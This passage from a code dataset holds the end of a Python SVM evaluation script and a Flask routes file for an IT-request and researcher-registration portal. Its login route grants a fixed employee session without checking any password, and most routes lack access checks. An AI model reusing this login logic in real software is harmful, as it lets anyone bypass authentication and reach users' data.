time:\", time.time() - beginTime)\n\n beginTime = time.time()\n pred_trainlabel = svcClf.predict(traindata)\n print(\"predict training time:\", time.time() - beginTime)\n num = len(pred_trainlabel)\n print(pred_trainlabel)\n accuracy = len([1 for i in range(num) if trainlabel[i] == pred_trainlabel[i]]) / float(num)\n print(\"train Accuracy:\", accuracy)\n\n beginTime = time.time()\n pred_testlabel = svcClf.predict(testdata)\n print(\"predict testing time:\", time.time() - beginTime)\n num = len(pred_testlabel)\n print(pred_testlabel)\n accuracy = len([1 for i in range(num) if testlabel[i]==pred_testlabel[i]])/float(num)\n print(\"test Accuracy:\",accuracy)\n\n return svcClf\n\n\ndef load_data(path):\n x = []\n y = []\n file_list = os.listdir(path)\n count = 0\n for file in file_list:\n if '.txt' not in file:\n continue\n file_to_read = open(path + file, 'r')\n tmp = file_to_read.read()\n tmp = tmp.replace('[', '').replace(']','')\n tmpx = [float(i) for i in tmp.split(',')]\n file_to_read.close()\n\n x.append(tmpx)\n y.append(int(file.split('.')[0].split('_')[1]) - 1)\n count+=1\n if count % 500 == 0:\n print(count)\n return np.array(x), np.array(y)\n\ndef preprocess_file_list(lst):\n file_list = []\n for file in lst:\n if '.txt' not in file:\n file_list.append(file)\n return file_list\n\nrec = np.zeros((num_classes, epochs))\nrec2 = np.zeros((epochs, num_classes))\nacc_rec = [0] * epochs\n\ndef evaluate(model, num_epochs, detail=False):\n file_list = preprocess_file_list(os.listdir(test_spatial_root))\n\n correct = 0\n all = len(file_list)\n sta = [0] * 51\n cc = [0] * 51\n count = 0\n for folder in file_list:\n ground_true = int(folder.split('_')[1]) - 1\n sta[ground_true] += 1\n new_path = test_spatial_root + folder + '/'\n test_x, test_y = load_data(new_path)\n\n out = model.predict(test_x)\n Mode = mode(out)[0][0]\n if Mode == ground_true:\n if detail:\n print('\\033[1;33;44m', count, ':', res, Mode, ground_true, '\\033[0m')\n correct += 1.0\n cc[ground_true] += 1\n else:\n if detail:\n print(count, ':', res, Mode, ground_true)\n count += 1\n\n print(correct, all, correct / all)\n acc_rec[num_epochs] = correct / all\n Dict = {}\n for i in range(num_classes):\n rec2[num_epochs][i] = rec[i][num_epochs] = Dict[i] = cc[i] * 1.0 / sta[i]\n Dict = sorted(Dict.items(), key=lambda e: e[1], reverse=True)\n for item in Dict:\n if detail:\n print('%3d, %.3lf, %3d' % (item[0], item[1], sta[item[0]]))\n\n # file_to_write = open(save_name, 'w')\n # file_to_write.write(str(correct / all) + '\\n')\n # for item in Dict:\n # # file_to_write.write(str(item[0]) + '\\t' + str(item[1]) + '\\t' + str(sta[item[0]]) + '\\n')\n # print('%3d %.3lf %3d' % (item[0], item[1], sta[item[0]]), file=file_to_write)\n # file_to_write.close()\n\n\n\nname = 'ten1_' + layer+ '_' + str(args.split) + 'keysorted_spatial_mlp_' + str(level1) + '_' + str(level2) + '_b' + str(batch_size) + '_kr' + str(int(kjud)) + '_br'+str(int(bjud))\n\nx_train, y_train = load_data(train_spatial_root)\n\nx_test, y_test = load_data(test_spatial_root)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\n# convert class vectors to binary class matrices\n# y_train = keras.utils.to_categorical(y_train, num_classes)\n# y_test = keras.utils.to_categorical(y_test, num_classes)\nsave_ = './evaluation_statistics/' + name + '/'\nif not os.path.exists(save_):\n os.makedirs(save_)\n\nmodel = svc(x_train,y_train, x_test, y_test)\nevaluate(model, 0)\n\n\nif write_csv:\n file_to_write = open(save_+'epochs_main.csv', 'w')\n 
print('epochs,', end=\"\", file=file_to_write)\n print(','.join([str(k) for k in range(epochs)]), file=file_to_write)\n print('acc,', end=\"\", file=file_to_write)\n print(','.join([str(k) for k in acc_rec]), file=file_to_write)\n for i in range(num_classes):\n print(str(i)+',',end=\"\", file=file_to_write)\n print(','.join([str(k) for k in rec[i]]), file=file_to_write)\n file_to_write.close()\n\n file_to_write = open(save_+'classes_main.csv', 'w')\n print('epochs,acc,', end=\"\", file=file_to_write)\n print(','.join([str(k) for k in range(num_classes)]), file=file_to_write)\n for i in range(epochs):\n print(str(i) + ',', end=\"\", file=file_to_write)\n print(str(acc_rec[i]) + ',', end=\"\", file=file_to_write)\n print(','.join([str(k) for k in rec2[i]]), file=file_to_write)\n file_to_write.close()\n\n # model.save('./scripts/'+name)\n # score = model.evaluate(x_test, y_test, verbose=0)\n # print('Test loss:', score[0])\n # print('Test accuracy:', score[1])\n", "sub_path": "pre_Feb_work/Main_spatial_svm.py", "file_name": "Main_spatial_svm.py", "file_ext": "py", "file_size_in_byte": 6418, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "sklearn.svm.SVC", "line_number": 45, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 51, "usage_type": "call"}, {"api_name": "time.time", "line_number": 57, "usage_type": "call"}, {"api_name": "time.time", "line_number": 59, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 97, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 101, "usage_type": "call"}, {"api_name": "scipy.stats.mode", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 157, "usage_type": "call"}, {"api_name": "os.path", "line_number": 157, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 158, "usage_type": "call"}]} +{"seq_id": "231755750", "text": "from flask import render_template, request, make_response,session\nimport datetime\nfrom app.Controller import Controller\nfrom app import app\nimport pdfkit\nfrom base64 import b64encode\nfrom werkzeug.security import generate_password_hash, \\\n check_password_hash\ncontrol=Controller()\n#index page function\n@app.route('/')\n@app.route('/index')\ndef index():\n return render_template('index.html')\n#login\n@app.route('/login',methods = ['POST', 'GET'])\ndef loginuser():\n if request.method == 'POST':\n category=request.form['cat']\n username=request.form['username']\n password=request.form['password']\n row=None\n us=None\n id=None\n if category==\"2\":\n row=control.loginUser(username,password)\n for i in row:\n id=i[0]\n row=control.getHostedUsername((id))\n for i in row:\n us=i[0]\n if username==us:\n session['id']=str(id)\n print(session['id'])\n session['name']=us\n return render_template('home2.html',title='Home',name=session['name'])\n else:\n session['id'] = 'EMP01'\n session['name']=control.getUser(session['id'])\n return 
render_template('home.html',title='Home',name=session['name'])\n return render_template('index.html')\n#it Page function\n@app.route('/it')\ndef it():\n return render_template('it.html', title='IT',name=session['name'])\n#General Application page function\n@app.route('/general_app')\ndef application():\n row=control.getEmpolyees()\n return render_template('writeapp.html', title='General Application' ,id=session['id'],row=row,name=session['name'])\n#Register User Page Function\n@app.route('/register')\ndef register_user():\n if 'name' in session:\n return render_template('register.html', title='Register Researcher',name=session['name'])\n else :\n return render_template('index.html')\n#document Created Detail\n@app.route('/document_created')\ndef document_created():\n row=control.getDocumentCreated(session['id'])\n return render_template('documentCreated.html', title='Document Created By Me', row=row,name=session['name'])\n#document View\n@app.route('/document_view',methods = ['POST', 'GET'])\ndef document_view():\n if request.method == 'POST':\n appid = request.form['appid']\n name=control.getForwardToName(appid)\n row=control.getApplicationDetail(appid)\n row2=control.getForwardtodetail(appid)\n return render_template('documentview.html', title='Document Detail', name1=name,row=row,row2=row2,name=session['name'])\n#document for sign\n@app.route('/document_sign',methods = ['POST', 'GET'])\ndef document_sign():\n row=control.getDocumentToSign(session['id'])\n return render_template('sign.html', title='Document Sign', row=row,name=session['name'])\n#Sign Document\n@app.route('/signed_app',methods = ['POST', 'GET'])\ndef signed_app():\n if request.method=='POST':\n appid=request.form['signapp']\n row=control.getApplicationDetail(appid)\n row2=control.getEmpolyees()\n return render_template('signed_app.html', title='Signed Document', row=row, row2=row2,name=session['name'])\n#save Signed document\n@app.route('/signed_document', methods=['POST','GET'])\ndef document_signed():\n if request.method=='POST':\n appid=request.form['appid']\n comment=request.form['signcomment']\n forward=request.form['signforward']\n action=request.form['signaction']\n designation=control.getEmployeeDesignation(session['id'])\n control.setCommentHistory(appid,comment,forward,action,designation,session['name'])\n row=control.getDocumentToSign(session['id'])\n return render_template('sign.html', title='Document Sign', row=row,name=session['name'])\n#login Request Form\n@app.route('/login_request',methods = ['POST', 'GET'])\ndef login_request():\n row=control.getEmpolyees()\n return render_template('loginrequest.html', title='Login Request', row=row, id=session['id'],name=session['name'])\n#save login Request Form\n@app.route('/login_request_save',methods = ['POST', 'GET'])\ndef save_login_request():\n if request.method=='POST':\n subject=\"Login Request\"\n bilding=request.form['logingbuilding']\n floor=request.form['loginflorr']\n room=request.form['loginroom']\n window=request.form['degree']\n emial_account=request.form['cv']\n print_quota=request.form['cp']\n linux_account=request.form['rl']\n fom=request.form['loginfrom']\n to=request.form['loginto']\n mac=request.form['loginmac']\n purpose=request.form['loginpurpose']\n content=\"Request for window login account: '\"+window+\"' Email Account: '\"+emial_account+\"' Print Quota: '\"+print_quota+\"' and linux ldap account: '\"+linux_account+\"'\"\n forward=request.form['appforward']\n files=request.files.getlist(\"appfile\")\n 
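# request.files.getlist('appfile') returns one werkzeug FileStorage object per selected file. A minimal sketch of how such uploads are commonly persisted before being handed to the controller; UPLOAD_DIR is a hypothetical path, not something this app defines, and Controller.setLoginRequest may store the files differently:
#
#     import os
#     from werkzeug.utils import secure_filename
#
#     UPLOAD_DIR = '/tmp/uploads'
#     for f in request.files.getlist('appfile'):
#         if f and f.filename:
#             f.save(os.path.join(UPLOAD_DIR, secure_filename(f.filename)))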
control.setLoginRequest(subject,bilding,floor,room,window,emial_account,print_quota,linux_account,fom,to,mac,purpose,content,forward,session['id'],files)\n return \"Request forward\"\n#machine request form\n@app.route('/machine_request',methods = ['POST', 'GET'])\ndef machine_request():\n row=control.getEmpolyees()\n return render_template('machine.html', title='Machine Request', row=row, id=session['id'],name=session['name'])\n#save machine request\n@app.route('/save_machine_request',methods=['POST','GET'])\ndef machine_request_save():\n if request.method=='POST':\n subject=\"New Machine Issuance Request\"\n bilding=request.form['machinebuilding']\n floor=request.form['machineflorr']\n room=request.form['machineroom']\n os=request.form['machineos']\n linux_flavour=request.form['machineflavour']\n software=request.form['machinesoftware']\n comment=request.form['machinecomment']\n content=\"Request for new machine, with operating system '\"+os+\"' and including softwares: '\"+software+\"'\"\n forward=request.form['appforward']\n files = request.files.getlist(\"appfile\")\n control.setMacineRequest(subject,bilding,floor,room,linux_flavour,comment,content,forward,session['id'],software,os,files)\n return \"Request forward\"\n#Network Request Form\n@app.route('/network_request',methods = ['POST', 'GET'])\ndef network_request():\n row=control.getEmpolyees()\n return render_template('networkreq.html', title='Network Request', row=row, id=session['id'],name=session['name'])\n#save network request form\n@app.route('/save_network_request',methods=['POST','GET'])\ndef network_request_save():\n if request.method=='POST':\n subject=\"Network Connection Request\"\n bilding=request.form['logingbuilding']\n floor=request.form['loginflorr']\n room=request.form['loginroom']\n fom=request.form['nfrom']\n to=request.form['nto']\n content=\"Netowk Connection Required at Building: '\"+bilding+\"', Floor: '\"+floor+\"' and Room: '\"+room+\"'\"\n forward = request.form['appforward']\n control.setNetwokRequest(subject,bilding,floor,room,fom,to,content,forward,session['id'])\n return \"Request Forward\"\n#print Quota Request Form\n@app.route('/print_request',methods = ['POST', 'GET'])\ndef print_request():\n row=control.getEmpolyees()\n return render_template('print.html', title='Print Request', row=row, id=session['id'],name=session['name'])\n#print Qouta Request Save\n@app.route('/save_print_request',methods=['POST','GET'])\ndef print_request_save():\n if request.method=='POST':\n subject=\"Print Quota Request\"\n pages=request.form['pages']\n content=\"Request to add the '\"+pages+\"' pages to my account\"\n forward=request.form['appforward']\n control.setPrintRequest(subject,pages,content,forward,session['id'])\n return \"Request Forward\"\n#Mail Request Form\n@app.route('/mail_request',methods = ['POST', 'GET'])\ndef mail_request():\n row=control.getEmpolyees()\n return render_template('mailqu.html', title='Mail Request', id=session['id'], row=row,name=session['name'])\n#Mail Quota Request Form save\n@app.route('/save_mail_request',methods=['POST','GET'])\ndef mail_request_save():\n if request.method=='POST':\n subject=\"Mail Quota Request\"\n gb=request.form['mail']\n content=\"Request to add the '\"+gb+\"' GB to my account for mail.\"\n forward=request.form['appforward']\n control.setMailRequest(subject,gb,content,forward,session['id'])\n return \"Request Forward\"\n#Passworf Reset Form\n@app.route('/passwordreset_request',methods = ['POST', 'GET'])\ndef passwordreset_request():\n 
row=control.getEmpolyees()\n    return render_template('passwordreset.html', title='Password Reset Request', row=row, id=session['id'],name=session['name'])\n#Save Password Reset Request\n@app.route('/save_password_reset_request',methods=['POST','GET'])\ndef password_reset_request_save():\n    if request.method=='POST':\n        subject=\"Password Reset Request\"\n        content=request.form['reason']\n        forward=request.form['appforward']\n        control.setPasswordResetRequest(subject,content,forward,session['id'])\n    return \"Request Forward\"\n#Save Application function\n@app.route('/save_app',methods=['POST', 'GET'])\ndef save_application():\n    if request.method=='POST':\n        subject=request.form['appsub']\n        content=request.form['appcontent']\n        forward=request.form['appforward']\n        name=control.getEmployeeid(forward)\n        print(name)\n        files=request.files.getlist(\"appfile\")\n        control.setGeneralApplication(subject,content,name,session['id'],files)\n    return \"Request Forward\"\n@app.route('/register_hosted', methods=['POST','GET'])\n#save hosted researcher record\ndef hosted_register():\n    if request.method == 'POST':\n\n        name = request.form['regname']\n        dob=request.form['regdob']\n        cnic=request.form['regcnic']\n        qualification=request.form['regqua']\n        qualification2=request.form.get('reqqother', '')\n\n        province = request.form['hrp']\n        city = request.form['hrc']\n\n        academic_record=request.form['regacad']\n        present_status=request.form['regps']\n        present_status2=request.form.get('reqpother', '')\n\n        designation=request.form['regpd']\n        enrollemnt_no=request.form['regpe']\n        uni=request.form['reguni']\n        department=request.form['regud']\n        permanent_address=request.form['regpa']\n        mailing_address=request.form['regma']\n        landline=request.form['regln']\n        cell=request.form['regc']\n        email=request.form['regem']\n        researcher_category=request.form['regrc']\n        department_NCP=request.form['regdncp']\n        duration_NCP=request.form['regncpduration']\n        supervisor_from_NCP=request.form['regncpsup']\n        cosupervisor_from_NCP=request.form['regncpcosup']\n        supervisor_name=request.form['hrsn']\n        supervisor_department=request.form['hrsnd']\n        tendate=request.form['tendate']\n        gender=request.form['hrg']\n        picture=request.files['regpicture']\n\n        print(\"ahmad\")\n        if qualification == \"Others\" and present_status !=\"Others\":\n            control.setHostedResearcher(session['id'],name,dob,cnic,qualification2,academic_record,present_status,designation,enrollemnt_no,uni,department,permanent_address,mailing_address,landline,cell,email,researcher_category,department_NCP,duration_NCP,supervisor_from_NCP,cosupervisor_from_NCP,picture,supervisor_name,supervisor_department,tendate,gender,province,city)\n\n        elif present_status ==\"Others\" and qualification !=\"Others\":\n            control.setHostedResearcher(session['id'], name, dob, cnic, qualification, academic_record, present_status2,\n                                        designation, enrollemnt_no, uni, department, permanent_address,\n                                        mailing_address, landline, cell, email, researcher_category, department_NCP,\n                                        duration_NCP, supervisor_from_NCP, cosupervisor_from_NCP,picture,supervisor_name,supervisor_department,tendate,gender,province,city )\n        elif qualification ==\"Others\" and present_status == \"Others\":\n            control.setHostedResearcher(session['id'], name, dob, cnic, qualification2, academic_record, present_status2,\n                                        designation, enrollemnt_no, uni, department, permanent_address,\n                                        mailing_address, landline, cell, email, researcher_category, department_NCP,\n                                        duration_NCP, supervisor_from_NCP, cosupervisor_from_NCP, picture,supervisor_name,supervisor_department,tendate,gender,province,city)\n        else:\n            
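# The "Others" handling above reads the two optional free-text fields and then branches four ways. Using .get() with the dropdown value as fallback would collapse the branches into a single call like the one that follows this comment. A sketch only, reusing the form field names from this view (remaining arguments as in the call below):
#
#     qualification = request.form.get('reqqother') or request.form['regqua']
#     present_status = request.form.get('reqpother') or request.form['regps']
#     control.setHostedResearcher(session['id'], name, dob, cnic,
#                                 qualification, academic_record, present_status,
#                                 designation, enrollemnt_no, uni, department,
#                                 permanent_address, mailing_address, landline,
#                                 cell, email, researcher_category, department_NCP,
#                                 duration_NCP, supervisor_from_NCP,
#                                 cosupervisor_from_NCP, picture, supervisor_name,
#                                 supervisor_department, tendate, gender,
#                                 province, city)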
control.setHostedResearcher(session['id'],name,dob,cnic,qualification,academic_record,present_status,designation,enrollemnt_no,uni,department,permanent_address,mailing_address,landline,cell,email,researcher_category,department_NCP,duration_NCP,supervisor_from_NCP,cosupervisor_from_NCP,picture,supervisor_name,supervisor_department,tendate,gender,province,city)\n control.sethostedRequest(session['id'])\n\n return render_template(\"home2.html\",name=session['name'])\n#software Form\n@app.route('/software_form', methods=['POST', 'GET'])\ndef softwareForm():\n row = control.getEmpolyees()\n return render_template('software.html', title='Software Request Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/cluster_form', methods=['POST', 'GET'])\ndef clusterForm():\n row = control.getEmpolyees()\n return render_template('cluster.html', title='Cluster Login Request Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/clearance_form', methods=['POST', 'GET'])\ndef clearanceform():\n row = control.getEmpolyees()\n return render_template('clearance.html', title='Clearance Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/equipment_form', methods=['POST', 'GET'])\ndef equipmentform():\n row = control.getEmpolyees()\n return render_template('equipment.html', title='Equipment Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/web_form', methods=['POST', 'GET'])\ndef webform():\n row = control.getEmpolyees()\n return render_template('website.html', title='Website Modification Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/colorprint_form', methods=['POST', 'GET'])\ndef colorprintform():\n row = control.getEmpolyees()\n return render_template('colorprint.html', title='Color Print Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/telephone_form', methods=['POST', 'GET'])\ndef telephoneform():\n row = control.getEmpolyees()\n return render_template('telephone.html', title='Telephone Extension Form', row=row, id=session['id'],\n name=session['name'])\n@app.route('/createaccount', methods=['POST', 'GET'])\ndef accountcreate():\n return render_template('createaccount.html', title='Registration')\n\n@app.route('/submit_form', methods=['POST', 'GET'])\ndef form_submit():\n if request.method == 'POST':\n name=request.form['name']\n username=request.form['username']\n email=request.form['email']\n password=request.form['ps']\n control.setUserDetail(name,username,email,password)\n return \"User save\"\n@app.route('/logout')\ndef logout():\n session.pop('name', None)\n return render_template('index.html')\n@app.route('/printregister')\ndef print_register():\n row=control.getHostedDeail(session['id'])\n for i in row:\n image=i[27]\n image = b64encode(image).decode(\"utf-8\")\n return render_template('printregister.html',row=row,image=image,title=\"Hosted Researcher Detail\")\n\n@app.route('/homeview')\ndef viewhome():\n return render_template('home.html',name=session['name'])\n@app.route('/caad')\ndef opencadd():\n return render_template('caad.html',name=session['name'])\n@app.route('/caddreports')\ndef caadreport():\n return render_template('caadreports.html',name=session['name'])\n\n@app.route('/request_caad')\ndef requesttocaad():\n row=control.getCaadRequest()\n return render_template('requestcaad.html',name=session['name'],row=row)\n@app.route('/reportcaadview', methods=['POST','GET'])\ndef caadreportview():\n if request.method == 'POST':\n id=request.form['id']\n row = 
control.getHostedDeail(id)\n for i in row:\n image = i[27]\n image = b64encode(image).decode(\"utf-8\")\n return render_template('caadreportview.html',name=session['name'],row=row,image=image)\n@app.route('/requestcaadview', methods=['POST','GET'])\ndef caadrequesttview():\n if request.method == 'POST':\n id=request.form['id']\n row = control.getHostedDeail(id)\n for i in row:\n image = i[27]\n image = b64encode(image).decode(\"utf-8\")\n return render_template('caadrequestview.html',name=session['name'],row=row,image=image)\n@app.route('/newid', methods=['POST','GET'])\ndef idnew():\n if request.method == 'POST':\n id=request.form['id']\n newid=request.form['newid']\n control.sethostednewid(id,newid)\n control.deleteCaadRequest(id)\n row = control.getCaadRequest()\n return render_template('requestcaad.html', name=session['name'], row=row)\n@app.route('/save_software_request',methods=['POST','GET'])\ndef software_request_save():\n if request.method=='POST':\n subject=\"Software Application Request\"\n software=request.form['softwarename']\n type=request.form['softtype']\n description=request.form['sofdis']\n content=\"Software Name: '\"+software+\"' type: '\"+type+ \"' Description: '\"+description+\"'\"\n forward = request.form['appforward']\n control.setSoftwareRequest(subject,content,forward,session['id'],software,type)\n return \"Request Forward\"\n@app.route('/save_cluster_request',methods=['POST','GET'])\ndef cluster_request_save():\n if request.method=='POST':\n subject=\"Cluster Login Request\"\n print(\"ahmad\")\n uni=request.form['cuc']\n\n thesis=request.form['ctrt']\n compiler=request.form['ccr']\n packages=request.form['cpr']\n fom=request.form['loginfrom']\n to=request.form['loginto']\n print(\"ahmad\")\n file=request.files['appfile']\n print(\"ahmad\")\n content=\"Thesis Title: '\"+thesis+\"' Compiler Required: '\"+compiler+ \"' Packages: '\"+packages+\"' from: '\"+fom+\"' to: '\"+to+\"'\"\n forward = request.form['appforward']\n control.setClusterRequest(subject,content,forward,session['id'],uni,compiler,packages,fom,to,file)\n return \"Request Forward\"\n\n@app.route('/save_clearance_request',methods=['POST','GET'])\ndef clearance_request_save():\n if request.method=='POST':\n subject=\"Cluster Login Request\"\n content=request.form['comment']\n forward = request.form['appforward']\n control.setItClearance(subject,content,forward,session['id'])\n return \"Request Forward\"\n\n@app.route('/save_itequipments_request',methods=['POST','GET'])\ndef itequipments_request_save():\n if request.method=='POST':\n subject=\"IT Equipments Issuance\"\n location=request.form.get('location')\n timefrom=request.form.get('tfrom')\n timeto=request.form.get('tto')\n datefrom=request.form.get('dfrom')\n dateto=request.form.get('dto')\n laptop=request.form.get('checklaptop')\n mouse=request.form.get('checkmouse')\n keyborad=request.form.get('checkkeyboard')\n speaker=request.form.get('checkspeaker')\n presernter=request.form.get('checkPresenter')\n pointer=request.form.get('checkPointer')\n projector=request.form.get('checkProjector')\n micro=request.form.get('checkmicro')\n hdmi=request.form.get('checkhdmi')\n tripord=request.form.get('checktripod')\n content=\"Eqiupments Required Keyboard '\"+str(keyborad)+\"', Mouse: '\"+str(mouse)+\"' , Speaker: '\"+str(speaker)+\"' , Presenter: '\"+str(presernter)+\"' \"\n forward = request.form['appforward']\n 
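# For HTML checkboxes, request.form.get() yields the submitted value (typically 'on') when ticked and None otherwise, so the str(...) concatenation above renders unticked items as the literal string 'None'. A sketch that normalises the flags first, using the field names from this form; it is not part of the original handler:
#
#     EQUIPMENT_FIELDS = ('checklaptop', 'checkmouse', 'checkkeyboard',
#                         'checkspeaker', 'checkPresenter', 'checkPointer',
#                         'checkProjector', 'checkmicro', 'checkhdmi',
#                         'checktripod')
#     picked = [f for f in EQUIPMENT_FIELDS if request.form.get(f) is not None]
#     content = 'Equipment required: ' + ', '.join(picked)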
control.setITequipments(subject,content,forward,session['id'],location,timefrom,timeto,datefrom,dateto,laptop,mouse,keyborad,speaker,presernter,pointer,projector,micro,hdmi,tripord)\n return \"Request Forward\"\n@app.route('/save_website_request',methods=['POST','GET'])\ndef website_request_save():\n if request.method=='POST':\n subject=\"Website Modification Request\"\n type=request.form.get('webtype')\n detail=request.form.get('webdetail')\n content=\"Webpage: '\"+type+\"' Detail: '\"+detail+\"'\"\n forward = request.form['appforward']\n control.setwebsiteRequest(subject,content,forward,session['id'])\n return \"Request Forward\"\n@app.route('/save_colorprint_request',methods=['POST','GET'])\ndef colorprint_request_save():\n if request.method=='POST':\n subject=\"Photocopy/ColorPrint Request\"\n pages=request.form.get('pages')\n content=\"Kindly Add '\"+pages+\"' color print pages \"\n forward = request.form['appforward']\n control.setcolorprintRequest(subject,content,forward,session['id'])\n return \"Request Forward\"\n@app.route('/save_telephone_request',methods=['POST','GET'])\ndef telephone_request_save():\n if request.method=='POST':\n subject=\"Telephone Extension Requirement\"\n biulding=request.form.get('logingbuilding')\n floor=request.form.get('loginflorr')\n room=request.form.get('loginroom')\n telephone=request.form.get('ttype')\n extendion=request.form.get('degree')\n national=request.form.get('cv')\n international=request.form.get('cp')\n content=\"Telephone Connection Required in Building '\"+biulding+\"', floor '\"+floor+\"' and room '\"+room+\"'\"\n forward = request.form['appforward']\n control.settelophone(subject,content,forward,session['id'],biulding,floor,room,telephone,extendion,national,international)\n return \"Request Forward\"\n@app.route('/uni')\ndef uni():\n row=control.gethoste()\n return render_template('caadreports.html' ,row=row,name=session['name'],title='CAAD Record')\n", "sub_path": "app/routes.py", "file_name": "routes.py", "file_ext": "py", "file_size_in_byte": 22477, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "app.Controller.Controller", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 14, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 11, "usage_type": "call"}, {"api_name": "app.app", "line_number": 11, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 12, "usage_type": "call"}, {"api_name": "app.app", "line_number": 12, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 19, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 19, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 35, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 36, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 36, 
"usage_type": "name"}, {"api_name": "flask.session", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 39, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 40, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 40, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 41, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 16, "usage_type": "call"}, {"api_name": "app.app", "line_number": 16, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 45, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 45, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 43, "usage_type": "call"}, {"api_name": "app.app", "line_number": 43, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 50, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 50, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 47, "usage_type": "call"}, {"api_name": "app.app", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 55, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 55, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 57, "usage_type": "call"}, {"api_name": "app.app.route", "line_number": 52, "usage_type": "call"}, {"api_name": "app.app", "line_number": 52, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 61, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 62, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 62, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 59, "usage_type": "call"}, {"api_name": "app.app", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 66, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 66, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 67, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 67, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 71, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 71, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 64, "usage_type": "call"}, {"api_name": "app.app", "line_number": 64, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 75, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 76, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 73, "usage_type": "call"}, {"api_name": "app.app", "line_number": 73, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 80, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 80, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 81, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 81, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 84, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 84, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 78, "usage_type": "call"}, {"api_name": "app.app", "line_number": 78, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 88, "usage_type": 
"attribute"}, {"api_name": "flask.request", "line_number": 88, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 89, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 89, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 90, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 90, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 91, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 91, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 92, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 92, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 93, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 94, "usage_type": "name"}, {"api_name": "flask.session", "line_number": 95, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 96, "usage_type": "call"}, {"api_name": "flask.session", "line_number": 96, "usage_type": "name"}, {"api_name": "app.app.route", "line_number": 86, "usage_type": "call"}, {"api_name": "app.app", "line_number": 86, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 101, "usage_type": 